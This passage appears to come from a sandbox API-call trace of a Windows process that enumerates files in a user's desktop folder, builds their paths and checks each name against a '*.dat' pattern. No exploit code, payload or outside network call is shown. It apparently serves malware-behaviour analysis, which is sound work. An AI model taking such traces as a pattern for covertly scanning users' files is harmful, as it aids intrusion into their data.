ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.748] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.748] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.748] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.748] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.748] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.748] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2ae0 [0110.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2ae0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.748] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.748] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab28 [0110.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.749] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*.dat") returned 0 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.749] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.749] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.749] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.749] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.749] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.749] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.749] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="\\p B1LdDcHaeS\\E144W5Mz.swf") returned="\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.749] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.749] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2c48 [0110.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a2c48, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.749] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.749] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaac8 [0110.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaac8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0110.749] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*.dat") returned 0 [0110.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0110.749] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.749] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.750] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.750] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.750] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.750] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.750] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eb080 [0110.750] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.750] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab70 [0110.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab70, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.750] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0110.750] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*.dat") returned 0 [0110.750] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb080 | out: hHeap=0x29a0000) returned 1 [0110.750] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.750] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.750] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.750] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.750] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.750] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.750] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.750] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2b70 [0110.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2b70, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b70 | out: hHeap=0x29a0000) returned 1 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabb8 [0110.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aabb8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.751] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*.dat") returned 0 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.751] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.751] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.751] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.751] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.751] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.751] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.751] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2780 [0110.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a2780, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2780 | out: hHeap=0x29a0000) returned 1 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.751] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.751] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*.dat") returned 0 [0110.751] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.752] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.752] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.752] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.752] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.752] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.752] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.752] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2978 [0110.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2978, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.752] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.752] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab28 [0110.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.752] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.752] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*.dat") returned 0 [0110.752] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.752] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.752] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 